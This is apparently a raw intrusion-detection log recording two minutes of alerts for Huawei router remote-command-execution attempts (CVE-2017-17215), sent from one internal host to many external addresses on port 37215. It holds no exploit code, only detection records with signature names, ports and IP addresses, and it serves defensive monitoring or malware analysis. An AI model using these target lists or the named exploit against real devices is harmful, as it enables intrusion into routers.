                                                        06/13/24-21:32:36.268283TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3504437215192.168.2.14156.158.94.207
                                                        06/13/24-21:33:15.272170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5757437215192.168.2.1441.118.36.223
                                                        06/13/24-21:32:15.610322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6050837215192.168.2.14197.5.221.125
                                                        06/13/24-21:32:52.656106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3675237215192.168.2.14156.50.134.92
                                                        06/13/24-21:32:50.610008TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3681637215192.168.2.14197.40.58.221
                                                        06/13/24-21:32:50.611878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5456637215192.168.2.1441.96.226.145
                                                        06/13/24-21:32:21.804357TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5779037215192.168.2.14156.184.9.210
                                                        06/13/24-21:33:07.041511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3698037215192.168.2.14156.128.50.13
                                                        06/13/24-21:32:40.376827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3445037215192.168.2.14156.143.215.246
                                                        06/13/24-21:33:02.912901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4062437215192.168.2.14197.84.99.115
                                                        06/13/24-21:32:48.553507TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5203037215192.168.2.14156.207.70.157
                                                        06/13/24-21:33:13.227718TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3547637215192.168.2.14197.14.250.81
                                                        06/13/24-21:32:50.613341TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3571637215192.168.2.14156.208.188.151
                                                        06/13/24-21:32:21.804665TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3348437215192.168.2.1441.123.161.80
                                                        06/13/24-21:32:15.638733TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5441037215192.168.2.1441.216.203.128
                                                        06/13/24-21:32:17.694268TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5832637215192.168.2.14156.122.122.59
                                                        06/13/24-21:32:56.755907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4494837215192.168.2.14197.241.110.119
                                                        06/13/24-21:32:58.839562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3428437215192.168.2.14197.83.69.171
                                                        06/13/24-21:32:46.528524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5199837215192.168.2.14156.164.83.42
                                                        06/13/24-21:32:11.485000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5952037215192.168.2.1441.175.85.36
                                                        06/13/24-21:32:19.753508TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4200837215192.168.2.1441.54.92.8
                                                        06/13/24-21:32:01.223387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5828637215192.168.2.14197.142.10.152
                                                        06/13/24-21:32:54.709918TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6030437215192.168.2.14156.80.141.226
                                                        06/13/24-21:32:38.322475TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4045237215192.168.2.14156.28.189.174
                                                        06/13/24-21:33:07.040187TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5147037215192.168.2.14197.254.11.159
                                                        06/13/24-21:33:07.041593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3990637215192.168.2.1441.98.127.110
                                                        06/13/24-21:32:54.725751TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4000437215192.168.2.14156.56.22.241
                                                        06/13/24-21:32:21.802157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5546037215192.168.2.14156.161.72.81
                                                        06/13/24-21:32:30.076671TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3786637215192.168.2.14156.100.240.20
                                                        06/13/24-21:32:58.821381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4276837215192.168.2.1441.44.13.179
                                                        06/13/24-21:33:11.180377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3335637215192.168.2.14156.219.86.163
                                                        06/13/24-21:32:52.659476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5678437215192.168.2.14197.78.55.61
                                                        06/13/24-21:33:11.160048TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4784437215192.168.2.1441.164.115.54
                                                        06/13/24-21:33:17.339812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5614237215192.168.2.14197.243.81.58
                                                        06/13/24-21:32:01.223823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4302837215192.168.2.1441.250.201.251
                                                        06/13/24-21:33:11.155721TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3727237215192.168.2.1441.234.140.3
                                                        06/13/24-21:32:40.373524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3334237215192.168.2.1441.14.117.248
                                                        06/13/24-21:32:09.439725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5568037215192.168.2.14197.0.165.82
                                                        06/13/24-21:32:28.025481TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4443837215192.168.2.14197.202.176.171
                                                        06/13/24-21:32:19.730276TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3491637215192.168.2.1441.164.222.12
                                                        06/13/24-21:32:36.244830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3486237215192.168.2.14197.223.197.51
                                                        06/13/24-21:32:58.824338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4911237215192.168.2.14197.250.17.36
                                                        06/13/24-21:32:48.552340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5004637215192.168.2.14197.251.188.29
                                                        06/13/24-21:32:48.571748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3822437215192.168.2.14197.228.42.126
                                                        06/13/24-21:32:07.419861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3709837215192.168.2.1441.162.239.218
                                                        06/13/24-21:32:38.300398TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5365437215192.168.2.14156.243.144.159
                                                        06/13/24-21:32:46.504021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6006237215192.168.2.14197.240.174.186
                                                        06/13/24-21:31:57.137780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5055037215192.168.2.14197.205.237.132
                                                        06/13/24-21:33:00.867872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5103037215192.168.2.14156.161.169.160
                                                        06/13/24-21:32:03.279635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3792837215192.168.2.14197.183.92.21
                                                        06/13/24-21:32:15.636091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3968237215192.168.2.1441.142.241.95
                                                        06/13/24-21:32:34.191062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4044237215192.168.2.14197.213.20.186
                                                        06/13/24-21:32:21.800977TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3542037215192.168.2.14156.194.199.111
                                                        06/13/24-21:32:38.303062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3668637215192.168.2.14197.118.104.35
                                                        06/13/24-21:33:17.305142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5071437215192.168.2.14156.45.197.81
                                                        06/13/24-21:32:09.456823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3332437215192.168.2.1441.81.232.142
                                                        06/13/24-21:32:38.318448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4996237215192.168.2.14156.76.13.208
                                                        06/13/24-21:33:00.889295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5927837215192.168.2.14197.47.139.82
                                                        06/13/24-21:33:15.256009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4855437215192.168.2.14197.145.66.83
                                                        06/13/24-21:32:36.268836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5003637215192.168.2.14197.45.227.7
                                                        06/13/24-21:33:07.056955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3847437215192.168.2.1441.188.129.59
                                                        06/13/24-21:32:01.238141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4637037215192.168.2.1441.244.214.253
                                                        06/13/24-21:32:28.042951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4414837215192.168.2.14197.33.7.64
                                                        06/13/24-21:32:52.658232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4612237215192.168.2.14197.82.101.108
                                                        06/13/24-21:33:17.309802TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5626237215192.168.2.14197.67.103.91
                                                        06/13/24-21:33:07.041937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4919837215192.168.2.14156.52.55.77
                                                        06/13/24-21:32:40.374887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5239837215192.168.2.14197.165.175.211
                                                        06/13/24-21:32:44.457107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5219837215192.168.2.14156.103.10.165
                                                        06/13/24-21:32:30.101086TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5258837215192.168.2.1441.222.6.252
                                                        06/13/24-21:32:40.356502TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4279237215192.168.2.1441.176.48.237
                                                        06/13/24-21:33:09.090604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5212837215192.168.2.14156.239.182.184
                                                        06/13/24-21:32:32.167849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5479437215192.168.2.14197.33.126.137
                                                        06/13/24-21:32:40.375066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3675837215192.168.2.14156.146.222.74
                                                        06/13/24-21:32:38.303607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5532637215192.168.2.14197.109.167.24
                                                        06/13/24-21:32:09.458535TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5965837215192.168.2.1441.93.237.34
                                                        06/13/24-21:32:05.378225TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5041437215192.168.2.1441.96.210.19
                                                        06/13/24-21:32:58.823722TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4213837215192.168.2.14156.75.176.219
                                                        06/13/24-21:32:58.821763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4276837215192.168.2.14156.204.126.118
                                                        06/13/24-21:33:09.112602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3707037215192.168.2.14156.93.73.208
                                                        06/13/24-21:32:09.460095TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4072837215192.168.2.14197.210.221.146
                                                        06/13/24-21:32:05.345282TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4604037215192.168.2.1441.231.15.82
                                                        06/13/24-21:32:17.702644TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3549837215192.168.2.14197.238.101.242
                                                        06/13/24-21:32:48.550905TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5418637215192.168.2.1441.193.197.163
                                                        06/13/24-21:32:17.693831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4102437215192.168.2.14156.243.188.145
                                                        06/13/24-21:32:50.612851TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5970037215192.168.2.14197.176.242.26
                                                        06/13/24-21:32:54.710656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5225837215192.168.2.14156.178.9.141
                                                        06/13/24-21:32:58.842681TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4780837215192.168.2.1441.88.233.72
                                                        06/13/24-21:33:09.088063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5914037215192.168.2.1441.221.53.93
                                                        06/13/24-21:32:32.155399TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3293437215192.168.2.14156.136.75.125
                                                        06/13/24-21:31:57.135813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5792037215192.168.2.14197.203.191.169
                                                        06/13/24-21:32:56.790524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5966837215192.168.2.14156.183.126.250
                                                        06/13/24-21:33:07.056416TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5677437215192.168.2.14156.242.196.104
                                                        06/13/24-21:32:58.838778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3968637215192.168.2.14156.225.183.236
                                                        06/13/24-21:32:54.709739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3737637215192.168.2.1441.249.86.178
                                                        06/13/24-21:32:03.276000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5844437215192.168.2.14156.91.16.222
                                                        06/13/24-21:33:11.172906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3898437215192.168.2.14156.13.188.53
                                                        06/13/24-21:32:21.781863TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4390437215192.168.2.14156.1.181.37
                                                        06/13/24-21:32:56.757221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3536037215192.168.2.14156.221.162.92
                                                        06/13/24-21:33:02.938097TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5339037215192.168.2.14156.230.138.134
                                                        06/13/24-21:32:30.092118TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4397837215192.168.2.14156.192.77.226
                                                        06/13/24-21:33:00.884453TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4618437215192.168.2.14197.199.229.169
                                                        06/13/24-21:32:48.556134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5579437215192.168.2.14156.156.80.209
                                                        06/13/24-21:32:05.371069TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4464037215192.168.2.14197.158.117.58
                                                        06/13/24-21:33:15.254681TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5822837215192.168.2.14156.185.22.132
                                                        06/13/24-21:32:21.786996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5836437215192.168.2.1441.9.210.6
                                                        06/13/24-21:32:38.318192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4403037215192.168.2.14197.196.8.139
                                                        06/13/24-21:33:15.254321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3312037215192.168.2.14156.53.144.136
                                                        06/13/24-21:32:42.421180TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4953237215192.168.2.1441.41.187.125
                                                        06/13/24-21:32:28.026547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5644037215192.168.2.14197.32.49.192
                                                        06/13/24-21:32:32.168527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6099437215192.168.2.14156.6.229.88
                                                        06/13/24-21:32:19.753736TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3823237215192.168.2.1441.135.217.100
                                                        06/13/24-21:32:11.509046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4538637215192.168.2.1441.238.165.73
                                                        06/13/24-21:32:58.840020TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4554037215192.168.2.14197.4.1.203
                                                        06/13/24-21:32:38.323418TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4801237215192.168.2.14197.30.107.215
                                                        06/13/24-21:32:03.275739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5977637215192.168.2.1441.4.72.60
                                                        06/13/24-21:32:03.308456TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4449037215192.168.2.14156.180.29.62
                                                        06/13/24-21:32:19.728076TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4123437215192.168.2.14156.106.134.134
                                                        06/13/24-21:31:57.131636TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3393437215192.168.2.14156.14.1.85
                                                        06/13/24-21:32:38.303886TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4863037215192.168.2.1441.58.163.80
                                                        06/13/24-21:32:44.451487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3607237215192.168.2.1441.73.222.15
                                                        06/13/24-21:32:17.694344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6000837215192.168.2.1441.131.238.147
                                                        06/13/24-21:32:21.783207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4854837215192.168.2.14156.127.216.140
                                                        06/13/24-21:32:03.275677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5787437215192.168.2.14197.41.203.209
                                                        06/13/24-21:33:17.306101TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3280437215192.168.2.14197.232.217.21
                                                        06/13/24-21:33:05.016679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5420237215192.168.2.14197.68.113.226
                                                        06/13/24-21:32:40.372766TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5022437215192.168.2.14197.106.156.8
                                                        06/13/24-21:32:54.711660TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3414037215192.168.2.1441.32.113.16
                                                        06/13/24-21:32:03.278770TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5413037215192.168.2.14197.205.249.150
                                                        06/13/24-21:33:09.090406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3388437215192.168.2.14197.81.248.88
                                                        06/13/24-21:32:15.635957TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5767237215192.168.2.14156.238.32.230
                                                        06/13/24-21:33:02.913466TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4246437215192.168.2.14197.127.127.215
                                                        06/13/24-21:32:17.696752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4415237215192.168.2.14197.226.38.62
                                                        06/13/24-21:32:34.194458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4872437215192.168.2.14156.192.239.174
                                                        06/13/24-21:32:07.415327TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3552237215192.168.2.14156.254.85.134
                                                        06/13/24-21:32:19.753050TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5664437215192.168.2.14156.156.109.136
                                                        06/13/24-21:32:36.242831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4723637215192.168.2.14156.20.221.19
                                                        06/13/24-21:32:58.838316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4810637215192.168.2.14197.26.83.112
                                                        06/13/24-21:33:15.272739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4436437215192.168.2.14197.237.138.174
                                                        06/13/24-21:32:01.246808TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3291837215192.168.2.14197.193.152.214
                                                        06/13/24-21:32:34.217007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5694637215192.168.2.1441.183.254.143
                                                        06/13/24-21:32:44.480799TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3735437215192.168.2.14197.79.243.242
                                                        06/13/24-21:33:07.056786TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5593837215192.168.2.1441.66.200.152
                                                        06/13/24-21:33:13.213451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3302637215192.168.2.14156.63.91.75
                                                        06/13/24-21:32:11.509419TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4377237215192.168.2.14156.24.194.18
                                                        06/13/24-21:32:40.358605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5370637215192.168.2.14197.99.206.127
                                                        06/13/24-21:32:58.820067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5770637215192.168.2.14156.6.127.86
                                                        06/13/24-21:32:05.377989TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5531237215192.168.2.14197.120.114.90
                                                        06/13/24-21:32:21.786736TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3671437215192.168.2.14156.54.218.230
                                                        06/13/24-21:32:07.415835TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4933637215192.168.2.14197.177.228.222
                                                        06/13/24-21:32:05.377303TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5205237215192.168.2.1441.69.169.65
                                                        06/13/24-21:32:34.196832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4882637215192.168.2.1441.77.61.16
                                                        06/13/24-21:32:28.044702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3795637215192.168.2.14197.170.107.4
                                                        06/13/24-21:33:02.952437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4131437215192.168.2.14197.127.144.33
                                                        06/13/24-21:33:07.060931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4533037215192.168.2.14197.253.150.127
                                                        06/13/24-21:32:15.611414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4858637215192.168.2.14156.170.91.101
                                                        06/13/24-21:33:04.989635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3389237215192.168.2.14197.3.167.8
                                                        06/13/24-21:33:02.910222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5663637215192.168.2.1441.100.62.119
                                                        06/13/24-21:33:13.212184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5773237215192.168.2.14156.132.212.166
                                                        06/13/24-21:32:23.936560TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5957637215192.168.2.14156.134.153.220
                                                        06/13/24-21:32:30.099337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4373637215192.168.2.14197.14.138.148
                                                        06/13/24-21:32:34.194354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4783637215192.168.2.14197.205.68.66
                                                        06/13/24-21:33:11.180916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3350237215192.168.2.14197.151.102.25
                                                        06/13/24-21:32:48.573420TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6047437215192.168.2.14197.163.107.104
                                                        06/13/24-21:33:17.339707TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6094437215192.168.2.1441.7.88.18
                                                        06/13/24-21:32:21.801015TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4591237215192.168.2.14156.76.130.170
                                                        06/13/24-21:32:38.322335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4038437215192.168.2.1441.11.6.12
                                                        06/13/24-21:33:09.090113TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3528837215192.168.2.1441.204.145.138
                                                        06/13/24-21:32:07.402652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4684837215192.168.2.14197.49.146.254
                                                        06/13/24-21:33:00.868092TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4025037215192.168.2.1441.64.54.77
                                                        06/13/24-21:33:05.010550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4197037215192.168.2.14156.186.93.210
                                                        06/13/24-21:32:58.825009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4918237215192.168.2.14197.15.1.123
                                                        06/13/24-21:32:19.728616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3967237215192.168.2.1441.83.188.224
                                                        06/13/24-21:32:34.200085TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5575237215192.168.2.14156.201.129.45
                                                        06/13/24-21:33:07.041481TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3306037215192.168.2.14156.103.70.206
                                                        06/13/24-21:32:36.265714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4340437215192.168.2.1441.151.34.201
                                                        06/13/24-21:32:23.935425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4502237215192.168.2.14156.189.229.10
                                                        06/13/24-21:32:38.322805TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3760437215192.168.2.14156.3.64.73
                                                        06/13/24-21:32:19.749014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3870237215192.168.2.1441.110.143.196
                                                        06/13/24-21:31:59.177865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3749037215192.168.2.14197.209.154.175
                                                        06/13/24-21:32:30.077880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3982437215192.168.2.14197.93.246.137
                                                        06/13/24-21:32:42.422726TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3866237215192.168.2.1441.62.110.146
                                                        06/13/24-21:33:00.884607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4599237215192.168.2.14197.205.172.125
                                                        06/13/24-21:32:32.155933TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4572437215192.168.2.14197.105.220.206
                                                        06/13/24-21:32:34.199971TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5761037215192.168.2.14197.229.17.50
                                                        06/13/24-21:32:46.524474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4574037215192.168.2.1441.67.94.195
